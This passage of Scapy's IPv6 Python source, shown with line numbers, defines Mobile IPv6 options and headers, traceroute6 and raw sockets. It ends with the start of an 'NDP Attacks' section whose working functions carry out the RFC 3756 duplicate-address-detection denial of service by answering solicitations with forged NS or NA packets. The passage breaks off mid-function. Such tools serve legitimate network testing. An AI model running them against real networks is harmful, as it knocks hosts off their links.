ICMPv6MPSol(_ICMPv6): 2729 name = 'ICMPv6 Mobile Prefix Solicitation' 2730 fields_desc = [ByteEnumField("type", 146, icmp6types), 2731 ByteField("code", 0), 2732 XShortField("cksum", None), 2733 XShortField("id", None), 2734 XShortField("res", 0)] 2735 2736 def _hashret(self): 2737 return struct.pack("!H", self.id) 2738 2739 2740class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6): 2741 name = 'ICMPv6 Mobile Prefix Advertisement' 2742 fields_desc = [ByteEnumField("type", 147, icmp6types), 2743 ByteField("code", 0), 2744 XShortField("cksum", None), 2745 XShortField("id", None), 2746 BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}), 2747 XBitField("res", 0, 14)] 2748 2749 def hashret(self): 2750 return struct.pack("!H", self.id) 2751 2752 def answers(self, other): 2753 return isinstance(other, ICMPv6MPSol) 2754 2755# Mobile IPv6 Options classes 2756 2757 2758_mobopttypes = {2: "Binding Refresh Advice", 2759 3: "Alternate Care-of Address", 2760 4: "Nonce Indices", 2761 5: "Binding Authorization Data", 2762 6: "Mobile Network Prefix (RFC3963)", 2763 7: "Link-Layer Address (RFC4068)", 2764 8: "Mobile Node Identifier (RFC4283)", 2765 9: "Mobility Message Authentication (RFC4285)", 2766 10: "Replay Protection (RFC4285)", 2767 11: "CGA Parameters Request (RFC4866)", 2768 12: "CGA Parameters (RFC4866)", 2769 13: "Signature (RFC4866)", 2770 14: "Home Keygen Token (RFC4866)", 2771 15: "Care-of Test Init (RFC4866)", 2772 16: "Care-of Test (RFC4866)"} 2773 2774 2775class _MIP6OptAlign(Packet): 2776 """ Mobile IPv6 options have alignment requirements of the form x*n+y. 2777 This class is inherited by all MIPv6 options to help in computing the 2778 required Padding for that option, i.e. the need for a Pad1 or PadN 2779 option before it. They only need to provide x and y as class 2780 parameters. (x=0 and y=0 are used when no alignment is required)""" 2781 2782 __slots__ = ["x", "y"] 2783 2784 def alignment_delta(self, curpos): 2785 x = self.x 2786 y = self.y 2787 if x == 0 and y == 0: 2788 return 0 2789 delta = x * ((curpos - y + x - 1) // x) + y - curpos 2790 return delta 2791 2792 def extract_padding(self, p): 2793 return b"", p 2794 2795 2796class MIP6OptBRAdvice(_MIP6OptAlign): 2797 name = 'Mobile IPv6 Option - Binding Refresh Advice' 2798 fields_desc = [ByteEnumField('otype', 2, _mobopttypes), 2799 ByteField('olen', 2), 2800 ShortField('rinter', 0)] 2801 x = 2 2802 y = 0 # alignment requirement: 2n 2803 2804 2805class MIP6OptAltCoA(_MIP6OptAlign): 2806 name = 'MIPv6 Option - Alternate Care-of Address' 2807 fields_desc = [ByteEnumField('otype', 3, _mobopttypes), 2808 ByteField('olen', 16), 2809 IP6Field("acoa", "::")] 2810 x = 8 2811 y = 6 # alignment requirement: 8n+6 2812 2813 2814class MIP6OptNonceIndices(_MIP6OptAlign): 2815 name = 'MIPv6 Option - Nonce Indices' 2816 fields_desc = [ByteEnumField('otype', 4, _mobopttypes), 2817 ByteField('olen', 16), 2818 ShortField('hni', 0), 2819 ShortField('coni', 0)] 2820 x = 2 2821 y = 0 # alignment requirement: 2n 2822 2823 2824class MIP6OptBindingAuthData(_MIP6OptAlign): 2825 name = 'MIPv6 Option - Binding Authorization Data' 2826 fields_desc = [ByteEnumField('otype', 5, _mobopttypes), 2827 ByteField('olen', 16), 2828 BitField('authenticator', 0, 96)] 2829 x = 8 2830 y = 2 # alignment requirement: 8n+2 2831 2832 2833class MIP6OptMobNetPrefix(_MIP6OptAlign): # NEMO - RFC 3963 2834 name = 'NEMO Option - Mobile Network Prefix' 2835 fields_desc = [ByteEnumField("otype", 6, _mobopttypes), 2836 ByteField("olen", 18), 2837 ByteField("reserved", 0), 2838 ByteField("plen", 64), 2839 IP6Field("prefix", "::")] 2840 x = 8 2841 y = 4 # alignment requirement: 8n+4 2842 2843 2844class MIP6OptLLAddr(_MIP6OptAlign): # Sect 6.4.4 of RFC 4068 2845 name = "MIPv6 Option - Link-Layer Address (MH-LLA)" 2846 fields_desc = [ByteEnumField("otype", 7, _mobopttypes), 2847 ByteField("olen", 7), 2848 ByteEnumField("ocode", 2, _rfc4068_lla_optcode), 2849 ByteField("pad", 0), 2850 MACField("lla", ETHER_ANY)] # Only support ethernet 2851 x = 0 2852 y = 0 # alignment requirement: none 2853 2854 2855class MIP6OptMNID(_MIP6OptAlign): # RFC 4283 2856 name = "MIPv6 Option - Mobile Node Identifier" 2857 fields_desc = [ByteEnumField("otype", 8, _mobopttypes), 2858 FieldLenField("olen", None, length_of="id", fmt="B", 2859 adjust=lambda pkt, x: x + 1), 2860 ByteEnumField("subtype", 1, {1: "NAI"}), 2861 StrLenField("id", "", 2862 length_from=lambda pkt: pkt.olen - 1)] 2863 x = 0 2864 y = 0 # alignment requirement: none 2865 2866# We only support decoding and basic build. Automatic HMAC computation is 2867# too much work for our current needs. It is left to the user (I mean ... 2868# you). --arno 2869 2870 2871class MIP6OptMsgAuth(_MIP6OptAlign): # RFC 4285 (Sect. 5) 2872 name = "MIPv6 Option - Mobility Message Authentication" 2873 fields_desc = [ByteEnumField("otype", 9, _mobopttypes), 2874 FieldLenField("olen", None, length_of="authdata", fmt="B", 2875 adjust=lambda pkt, x: x + 5), 2876 ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", # noqa: E501 2877 2: "MN-AAA authentication mobility option"}), # noqa: E501 2878 IntField("mspi", None), 2879 StrLenField("authdata", "A" * 12, 2880 length_from=lambda pkt: pkt.olen - 5)] 2881 x = 4 2882 y = 1 # alignment requirement: 4n+1 2883 2884# Extracted from RFC 1305 (NTP) : 2885# NTP timestamps are represented as a 64-bit unsigned fixed-point number, 2886# in seconds relative to 0h on 1 January 1900. The integer part is in the 2887# first 32 bits and the fraction part in the last 32 bits. 2888 2889 2890class NTPTimestampField(LongField): 2891 def i2repr(self, pkt, x): 2892 if x < ((50 * 31536000) << 32): 2893 return "Some date a few decades ago (%d)" % x 2894 2895 # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to 2896 # January 1st 1970 : 2897 delta = -2209075761 2898 i = int(x >> 32) 2899 j = float(x & 0xffffffff) * 2.0**-32 2900 res = i + j + delta 2901 t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res)) 2902 2903 return "%s (%d)" % (t, x) 2904 2905 2906class MIP6OptReplayProtection(_MIP6OptAlign): # RFC 4285 (Sect. 6) 2907 name = "MIPv6 option - Replay Protection" 2908 fields_desc = [ByteEnumField("otype", 10, _mobopttypes), 2909 ByteField("olen", 8), 2910 NTPTimestampField("timestamp", 0)] 2911 x = 8 2912 y = 2 # alignment requirement: 8n+2 2913 2914 2915class MIP6OptCGAParamsReq(_MIP6OptAlign): # RFC 4866 (Sect. 5.6) 2916 name = "MIPv6 option - CGA Parameters Request" 2917 fields_desc = [ByteEnumField("otype", 11, _mobopttypes), 2918 ByteField("olen", 0)] 2919 x = 0 2920 y = 0 # alignment requirement: none 2921 2922# XXX TODO: deal with CGA param fragmentation and build of defragmented 2923# XXX version. Passing of a big CGAParam structure should be 2924# XXX simplified. Make it hold packets, by the way --arno 2925 2926 2927class MIP6OptCGAParams(_MIP6OptAlign): # RFC 4866 (Sect. 5.1) 2928 name = "MIPv6 option - CGA Parameters" 2929 fields_desc = [ByteEnumField("otype", 12, _mobopttypes), 2930 FieldLenField("olen", None, length_of="cgaparams", fmt="B"), 2931 StrLenField("cgaparams", "", 2932 length_from=lambda pkt: pkt.olen)] 2933 x = 0 2934 y = 0 # alignment requirement: none 2935 2936 2937class MIP6OptSignature(_MIP6OptAlign): # RFC 4866 (Sect. 5.2) 2938 name = "MIPv6 option - Signature" 2939 fields_desc = [ByteEnumField("otype", 13, _mobopttypes), 2940 FieldLenField("olen", None, length_of="sig", fmt="B"), 2941 StrLenField("sig", "", 2942 length_from=lambda pkt: pkt.olen)] 2943 x = 0 2944 y = 0 # alignment requirement: none 2945 2946 2947class MIP6OptHomeKeygenToken(_MIP6OptAlign): # RFC 4866 (Sect. 5.3) 2948 name = "MIPv6 option - Home Keygen Token" 2949 fields_desc = [ByteEnumField("otype", 14, _mobopttypes), 2950 FieldLenField("olen", None, length_of="hkt", fmt="B"), 2951 StrLenField("hkt", "", 2952 length_from=lambda pkt: pkt.olen)] 2953 x = 0 2954 y = 0 # alignment requirement: none 2955 2956 2957class MIP6OptCareOfTestInit(_MIP6OptAlign): # RFC 4866 (Sect. 5.4) 2958 name = "MIPv6 option - Care-of Test Init" 2959 fields_desc = [ByteEnumField("otype", 15, _mobopttypes), 2960 ByteField("olen", 0)] 2961 x = 0 2962 y = 0 # alignment requirement: none 2963 2964 2965class MIP6OptCareOfTest(_MIP6OptAlign): # RFC 4866 (Sect. 5.5) 2966 name = "MIPv6 option - Care-of Test" 2967 fields_desc = [ByteEnumField("otype", 16, _mobopttypes), 2968 FieldLenField("olen", None, length_of="cokt", fmt="B"), 2969 StrLenField("cokt", b'\x00' * 8, 2970 length_from=lambda pkt: pkt.olen)] 2971 x = 0 2972 y = 0 # alignment requirement: none 2973 2974 2975class MIP6OptUnknown(_MIP6OptAlign): 2976 name = 'Scapy6 - Unknown Mobility Option' 2977 fields_desc = [ByteEnumField("otype", 6, _mobopttypes), 2978 FieldLenField("olen", None, length_of="odata", fmt="B"), 2979 StrLenField("odata", "", 2980 length_from=lambda pkt: pkt.olen)] 2981 x = 0 2982 y = 0 # alignment requirement: none 2983 2984 @classmethod 2985 def dispatch_hook(cls, _pkt=None, *_, **kargs): 2986 if _pkt: 2987 o = orb(_pkt[0]) # Option type 2988 if o in moboptcls: 2989 return moboptcls[o] 2990 return cls 2991 2992 2993moboptcls = {0: Pad1, 2994 1: PadN, 2995 2: MIP6OptBRAdvice, 2996 3: MIP6OptAltCoA, 2997 4: MIP6OptNonceIndices, 2998 5: MIP6OptBindingAuthData, 2999 6: MIP6OptMobNetPrefix, 3000 7: MIP6OptLLAddr, 3001 8: MIP6OptMNID, 3002 9: MIP6OptMsgAuth, 3003 10: MIP6OptReplayProtection, 3004 11: MIP6OptCGAParamsReq, 3005 12: MIP6OptCGAParams, 3006 13: MIP6OptSignature, 3007 14: MIP6OptHomeKeygenToken, 3008 15: MIP6OptCareOfTestInit, 3009 16: MIP6OptCareOfTest} 3010 3011 3012# Main Mobile IPv6 Classes 3013 3014mhtypes = {0: 'BRR', 3015 1: 'HoTI', 3016 2: 'CoTI', 3017 3: 'HoT', 3018 4: 'CoT', 3019 5: 'BU', 3020 6: 'BA', 3021 7: 'BE', 3022 8: 'Fast BU', 3023 9: 'Fast BA', 3024 10: 'Fast NA'} 3025 3026# From http://www.iana.org/assignments/mobility-parameters 3027bastatus = {0: 'Binding Update accepted', 3028 1: 'Accepted but prefix discovery necessary', 3029 128: 'Reason unspecified', 3030 129: 'Administratively prohibited', 3031 130: 'Insufficient resources', 3032 131: 'Home registration not supported', 3033 132: 'Not home subnet', 3034 133: 'Not home agent for this mobile node', 3035 134: 'Duplicate Address Detection failed', 3036 135: 'Sequence number out of window', 3037 136: 'Expired home nonce index', 3038 137: 'Expired care-of nonce index', 3039 138: 'Expired nonces', 3040 139: 'Registration type change disallowed', 3041 140: 'Mobile Router Operation not permitted', 3042 141: 'Invalid Prefix', 3043 142: 'Not Authorized for Prefix', 3044 143: 'Forwarding Setup failed (prefixes missing)', 3045 144: 'MIPV6-ID-MISMATCH', 3046 145: 'MIPV6-MESG-ID-REQD', 3047 146: 'MIPV6-AUTH-FAIL', 3048 147: 'Permanent home keygen token unavailable', 3049 148: 'CGA and signature verification failed', 3050 149: 'Permanent home keygen token exists', 3051 150: 'Non-null home nonce index expected'} 3052 3053 3054class _MobilityHeader(Packet): 3055 name = 'Dummy IPv6 Mobility Header' 3056 overload_fields = {IPv6: {"nh": 135}} 3057 3058 def post_build(self, p, pay): 3059 p += pay 3060 tmp_len = self.len 3061 if self.len is None: 3062 tmp_len = (len(p) - 8) // 8 3063 p = p[:1] + struct.pack("B", tmp_len) + p[2:] 3064 if self.cksum is None: 3065 cksum = in6_chksum(135, self.underlayer, p) 3066 else: 3067 cksum = self.cksum 3068 p = p[:4] + struct.pack("!H", cksum) + p[6:] 3069 return p 3070 3071 3072class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg 3073 name = "IPv6 Mobility Header - Generic Message" 3074 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 3075 ByteField("len", None), 3076 ByteEnumField("mhtype", None, mhtypes), 3077 ByteField("res", None), 3078 XShortField("cksum", None), 3079 StrLenField("msg", b"\x00" * 2, 3080 length_from=lambda pkt: 8 * pkt.len - 6)] 3081 3082 3083class MIP6MH_BRR(_MobilityHeader): 3084 name = "IPv6 Mobility Header - Binding Refresh Request" 3085 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 3086 ByteField("len", None), 3087 ByteEnumField("mhtype", 0, mhtypes), 3088 ByteField("res", None), 3089 XShortField("cksum", None), 3090 ShortField("res2", None), 3091 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 3092 _OptionsField("options", [], MIP6OptUnknown, 8, 3093 length_from=lambda pkt: 8 * pkt.len)] 3094 overload_fields = {IPv6: {"nh": 135}} 3095 3096 def hashret(self): 3097 # Hack: BRR, BU and BA have the same hashret that returns the same 3098 # value b"\x00\x08\x09" (concatenation of mhtypes). This is 3099 # because we need match BA with BU and BU with BRR. --arno 3100 return b"\x00\x08\x09" 3101 3102 3103class MIP6MH_HoTI(_MobilityHeader): 3104 name = "IPv6 Mobility Header - Home Test Init" 3105 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 3106 ByteField("len", None), 3107 ByteEnumField("mhtype", 1, mhtypes), 3108 ByteField("res", None), 3109 XShortField("cksum", None), 3110 StrFixedLenField("reserved", b"\x00" * 2, 2), 3111 StrFixedLenField("cookie", b"\x00" * 8, 8), 3112 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 3113 _OptionsField("options", [], MIP6OptUnknown, 16, 3114 length_from=lambda pkt: 8 * (pkt.len - 1))] 3115 overload_fields = {IPv6: {"nh": 135}} 3116 3117 def hashret(self): 3118 return bytes_encode(self.cookie) 3119 3120 3121class MIP6MH_CoTI(MIP6MH_HoTI): 3122 name = "IPv6 Mobility Header - Care-of Test Init" 3123 mhtype = 2 3124 3125 def hashret(self): 3126 return bytes_encode(self.cookie) 3127 3128 3129class MIP6MH_HoT(_MobilityHeader): 3130 name = "IPv6 Mobility Header - Home Test" 3131 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 3132 ByteField("len", None), 3133 ByteEnumField("mhtype", 3, mhtypes), 3134 ByteField("res", None), 3135 XShortField("cksum", None), 3136 ShortField("index", None), 3137 StrFixedLenField("cookie", b"\x00" * 8, 8), 3138 StrFixedLenField("token", b"\x00" * 8, 8), 3139 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 3140 _OptionsField("options", [], MIP6OptUnknown, 24, 3141 length_from=lambda pkt: 8 * (pkt.len - 2))] 3142 overload_fields = {IPv6: {"nh": 135}} 3143 3144 def hashret(self): 3145 return bytes_encode(self.cookie) 3146 3147 def answers(self, other): 3148 if (isinstance(other, MIP6MH_HoTI) and 3149 self.cookie == other.cookie): 3150 return 1 3151 return 0 3152 3153 3154class MIP6MH_CoT(MIP6MH_HoT): 3155 name = "IPv6 Mobility Header - Care-of Test" 3156 mhtype = 4 3157 3158 def hashret(self): 3159 return bytes_encode(self.cookie) 3160 3161 def answers(self, other): 3162 if (isinstance(other, MIP6MH_CoTI) and 3163 self.cookie == other.cookie): 3164 return 1 3165 return 0 3166 3167 3168class LifetimeField(ShortField): 3169 def i2repr(self, pkt, x): 3170 return "%d sec" % (4 * x) 3171 3172 3173class MIP6MH_BU(_MobilityHeader): 3174 name = "IPv6 Mobility Header - Binding Update" 3175 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 3176 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 3177 ByteEnumField("mhtype", 5, mhtypes), 3178 ByteField("res", None), 3179 XShortField("cksum", None), 3180 XShortField("seq", None), # TODO: ShortNonceField 3181 FlagsField("flags", "KHA", 7, "PRMKLHA"), 3182 XBitField("reserved", 0, 9), 3183 LifetimeField("mhtime", 3), # unit == 4 seconds 3184 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 3185 _OptionsField("options", [], MIP6OptUnknown, 12, 3186 length_from=lambda pkt: 8 * pkt.len - 4)] 3187 overload_fields = {IPv6: {"nh": 135}} 3188 3189 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() 3190 return b"\x00\x08\x09" 3191 3192 def answers(self, other): 3193 if isinstance(other, MIP6MH_BRR): 3194 return 1 3195 return 0 3196 3197 3198class MIP6MH_BA(_MobilityHeader): 3199 name = "IPv6 Mobility Header - Binding ACK" 3200 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 3201 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 3202 ByteEnumField("mhtype", 6, mhtypes), 3203 ByteField("res", None), 3204 XShortField("cksum", None), 3205 ByteEnumField("status", 0, bastatus), 3206 FlagsField("flags", "K", 3, "PRK"), 3207 XBitField("res2", None, 5), 3208 XShortField("seq", None), # TODO: ShortNonceField 3209 XShortField("mhtime", 0), # unit == 4 seconds 3210 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 3211 _OptionsField("options", [], MIP6OptUnknown, 12, 3212 length_from=lambda pkt: 8 * pkt.len - 4)] 3213 overload_fields = {IPv6: {"nh": 135}} 3214 3215 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() 3216 return b"\x00\x08\x09" 3217 3218 def answers(self, other): 3219 if (isinstance(other, MIP6MH_BU) and 3220 other.mhtype == 5 and 3221 self.mhtype == 6 and 3222 other.flags & 0x1 and # Ack request flags is set 3223 self.seq == other.seq): 3224 return 1 3225 return 0 3226 3227 3228_bestatus = {1: 'Unknown binding for Home Address destination option', 3229 2: 'Unrecognized MH Type value'} 3230 3231# TODO: match Binding Error to its stimulus 3232 3233 3234class MIP6MH_BE(_MobilityHeader): 3235 name = "IPv6 Mobility Header - Binding Error" 3236 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 3237 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 3238 ByteEnumField("mhtype", 7, mhtypes), 3239 ByteField("res", 0), 3240 XShortField("cksum", None), 3241 ByteEnumField("status", 0, _bestatus), 3242 ByteField("reserved", 0), 3243 IP6Field("ha", "::"), 3244 _OptionsField("options", [], MIP6OptUnknown, 24, 3245 length_from=lambda pkt: 8 * (pkt.len - 2))] 3246 overload_fields = {IPv6: {"nh": 135}} 3247 3248 3249_mip6_mhtype2cls = {0: MIP6MH_BRR, 3250 1: MIP6MH_HoTI, 3251 2: MIP6MH_CoTI, 3252 3: MIP6MH_HoT, 3253 4: MIP6MH_CoT, 3254 5: MIP6MH_BU, 3255 6: MIP6MH_BA, 3256 7: MIP6MH_BE} 3257 3258 3259############################################################################# 3260############################################################################# 3261# Traceroute6 # 3262############################################################################# 3263############################################################################# 3264 3265class AS_resolver6(AS_resolver_riswhois): 3266 def _resolve_one(self, ip): 3267 """ 3268 overloaded version to provide a Whois resolution on the 3269 embedded IPv4 address if the address is 6to4 or Teredo. 3270 Otherwise, the native IPv6 address is passed. 3271 """ 3272 3273 if in6_isaddr6to4(ip): # for 6to4, use embedded @ 3274 tmp = inet_pton(socket.AF_INET6, ip) 3275 addr = inet_ntop(socket.AF_INET, tmp[2:6]) 3276 elif in6_isaddrTeredo(ip): # for Teredo, use mapped address 3277 addr = teredoAddrExtractInfo(ip)[2] 3278 else: 3279 addr = ip 3280 3281 _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr) 3282 3283 if asn.startswith("AS"): 3284 try: 3285 asn = int(asn[2:]) 3286 except ValueError: 3287 pass 3288 3289 return ip, asn, desc 3290 3291 3292class TracerouteResult6(TracerouteResult): 3293 __slots__ = [] 3294 3295 def show(self): 3296 return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! # noqa: E501 3297 s.hlim, 3298 r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" + # noqa: E501 3299 "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" + # noqa: E501 3300 "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" + # noqa: E501 3301 "{ICMPv6EchoReply:%ir,type%}"))) # noqa: E501 3302 3303 def get_trace(self): 3304 trace = {} 3305 3306 for s, r in self.res: 3307 if IPv6 not in s: 3308 continue 3309 d = s[IPv6].dst 3310 if d not in trace: 3311 trace[d] = {} 3312 3313 t = not (ICMPv6TimeExceeded in r or 3314 ICMPv6DestUnreach in r or 3315 ICMPv6PacketTooBig in r or 3316 ICMPv6ParamProblem in r) 3317 3318 trace[d][s[IPv6].hlim] = r[IPv6].src, t 3319 3320 for k in six.itervalues(trace): 3321 try: 3322 m = min(x for x, y in six.iteritems(k) if y[1]) 3323 except ValueError: 3324 continue 3325 for li in list(k): # use list(): k is modified in the loop 3326 if li > m: 3327 del k[li] 3328 3329 return trace 3330 3331 def graph(self, ASres=AS_resolver6(), **kargs): 3332 TracerouteResult.graph(self, ASres=ASres, **kargs) 3333 3334 3335@conf.commands.register 3336def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(), 3337 l4=None, timeout=2, verbose=None, **kargs): 3338 """Instant TCP traceroute using IPv6 3339 traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None 3340 """ 3341 if verbose is None: 3342 verbose = conf.verb 3343 3344 if l4 is None: 3345 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport), # noqa: E501 3346 timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) # noqa: E501 3347 else: 3348 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4, 3349 timeout=timeout, verbose=verbose, **kargs) 3350 3351 a = TracerouteResult6(a.res) 3352 3353 if verbose: 3354 a.display() 3355 3356 return a, b 3357 3358############################################################################# 3359############################################################################# 3360# Sockets # 3361############################################################################# 3362############################################################################# 3363 3364 3365class L3RawSocket6(L3RawSocket): 3366 def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501 3367 L3RawSocket.__init__(self, type, filter, iface, promisc) 3368 # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501 3369 self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 3370 self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 3371 3372 3373def IPv6inIP(dst='203.178.135.36', src=None): 3374 _IPv6inIP.dst = dst 3375 _IPv6inIP.src = src 3376 if not conf.L3socket == _IPv6inIP: 3377 _IPv6inIP.cls = conf.L3socket 3378 else: 3379 del(conf.L3socket) 3380 return _IPv6inIP 3381 3382 3383class _IPv6inIP(SuperSocket): 3384 dst = '127.0.0.1' 3385 src = None 3386 cls = None 3387 3388 def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): # noqa: E501 3389 SuperSocket.__init__(self, family, type, proto) 3390 self.worker = self.cls(**args) 3391 3392 def set(self, dst, src=None): 3393 _IPv6inIP.src = src 3394 _IPv6inIP.dst = dst 3395 3396 def nonblock_recv(self): 3397 p = self.worker.nonblock_recv() 3398 return self._recv(p) 3399 3400 def recv(self, x): 3401 p = self.worker.recv(x) 3402 return self._recv(p, x) 3403 3404 def _recv(self, p, x=MTU): 3405 if p is None: 3406 return p 3407 elif isinstance(p, IP): 3408 # TODO: verify checksum 3409 if p.src == self.dst and p.proto == socket.IPPROTO_IPV6: 3410 if isinstance(p.payload, IPv6): 3411 return p.payload 3412 return p 3413 3414 def send(self, x): 3415 return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x) # noqa: E501 3416 3417 3418############################################################################# 3419############################################################################# 3420# Neighbor Discovery Protocol Attacks # 3421############################################################################# 3422############################################################################# 3423 3424def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None, 3425 tgt_filter=None, reply_mac=None): 3426 """ 3427 Internal generic helper accepting a specific callback as first argument, 3428 for NS or NA reply. See the two specific functions below. 3429 """ 3430 3431 def is_request(req, mac_src_filter, tgt_filter): 3432 """ 3433 Check if packet req is a request 3434 """ 3435 3436 # Those simple checks are based on Section 5.4.2 of RFC 4862 3437 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): 3438 return 0 3439 3440 # Get and compare the MAC address 3441 mac_src = req[Ether].src 3442 if mac_src_filter and mac_src != mac_src_filter: 3443 return 0 3444 3445 # Source must be the unspecified address 3446 if req[IPv6].src != "::": 3447 return 0 3448 3449 # Check destination is the link-local solicited-node multicast 3450 # address associated with target address in received NS 3451 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) 3452 if tgt_filter and tgt != tgt_filter: 3453 return 0 3454 received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst) 3455 expected_snma = in6_getnsma(tgt) 3456 if received_snma != expected_snma: 3457 return 0 3458 3459 return 1 3460 3461 if not iface: 3462 iface = conf.iface 3463 3464 # To prevent sniffing our own traffic 3465 if not reply_mac: 3466 reply_mac = get_if_hwaddr(iface) 3467 sniff_filter = "icmp6 and not ether src %s" % reply_mac 3468 3469 sniff(store=0, 3470 filter=sniff_filter, 3471 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), 3472 prn=lambda x: reply_callback(x, reply_mac, iface), 3473 iface=iface) 3474 3475 3476def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None, 3477 reply_mac=None): 3478 """ 3479 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3480 3756. This is done by listening incoming NS messages sent from the 3481 unspecified address and sending a NS reply for the target address, 3482 leading the peer to believe that another node is also performing DAD 3483 for that address. 3484 3485 By default, the fake NS sent to create the DoS uses: 3486 - as target address the target address found in received NS. 3487 - as IPv6 source address: the unspecified address (::). 3488 - as IPv6 destination address: the link-local solicited-node multicast 3489 address derived from the target address in received NS. 3490 - the mac address of the interface as source (or reply_mac, see below). 3491 - the multicast mac address derived from the solicited node multicast 3492 address used as IPv6 destination address. 3493 3494 Following arguments can be used to change the behavior: 3495 3496 iface: a specific interface (e.g. "eth0") of the system on which the 3497 DoS should be launched. If None is provided conf.iface is used. 3498 3499 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 3500 Only NS messages received from this source will trigger replies. 3501 This allows limiting the effects of the DoS to a single target by 3502 filtering on its mac address. The default value is None: the DoS 3503 is not limited to a specific mac address. 3504 3505 tgt_filter: Same as previous but for a specific target IPv6 address for 3506 received NS. If the target address in the NS message (not the IPv6 3507 destination address) matches that address, then a fake reply will 3508 be sent, i.e. the emitter will be a target of the DoS. 3509 3510 reply_mac: allow specifying a specific source mac address for the reply, 3511 i.e. to prevent the use of the mac address of the interface. 3512 """ 3513 3514 def ns_reply_callback(req, reply_mac, iface): 3515 """ 3516 Callback that reply to a NS by sending a similar NS 3517 """ 3518 3519 # Let's build a reply and send it 3520 mac = req[Ether].src 3521 dst = req[IPv6].dst 3522 tgt = req[ICMPv6ND_NS].tgt 3523 rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt) # noqa: E501 3524 sendp(rep, iface=iface, verbose=0) 3525 3526 print("Reply NS for target address %s (received from %s)" % (tgt, mac)) 3527 3528 _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter, 3529 tgt_filter, reply_mac) 3530 3531 3532def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None, 3533 reply_mac=None): 3534 """ 3535 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3536 3756. This is done by listening incoming NS messages *sent from the 3537 unspecified address* and sending a NA reply for the target address, 3538 leading the peer to believe that another node is also performing DAD 3539 for that address. 3540 3541 By default, the fake NA sent to create the DoS uses: 3542 - as target address the target address found in received NS. 3543 - as IPv6 source address: the target address found in received NS. 3544 - as IPv6 destination address: the link-local solicited-node multicast 3545 address derived from the target address in received NS. 3546 - the mac address of the interface as source (or reply_mac, see below). 3547 - the multicast mac address derived from the solicited node multicast 3548 address used as IPv6 destination address. 3549 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled 3550 with the mac address used as source of the NA. 3551 3552 Following arguments can be used to change the behavior: 3553 3554 iface: a specific interface (e.g. "eth0") of the system on which the 3555 DoS should be launched. If None is provided conf.iface is used. 3556 3557 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 3558 Only NS messages received from this source will trigger replies. 3559 This allows limiting the effects of the DoS to a single target by 3560 filtering on its mac address. The default value is None: the DoS 3561 is not limited to a specific mac address. 3562 3563 tgt_filter: Same as previous but for a specific target IPv6 address for 3564 received NS. If the target address in the NS message (not the IPv6 3565 destination address) matches that address, then a fake reply will 3566 be sent, i.e. the emitter will be a target of the DoS. 3567 3568 reply_mac: allow specifying a specific source mac address for the reply, 3569 i.e. to prevent the use of the mac address of the interface. This 3570 address will also be used in the Target Link-Layer Address option. 3571 """ 3572 3573 def na_reply_callback(req, reply_mac, iface): 3574 """ 3575 Callback that reply to a NS with a NA 3576 """ 3577 3578 # Let's build a reply and send it 3579 mac = req[Ether].src 3580 dst = 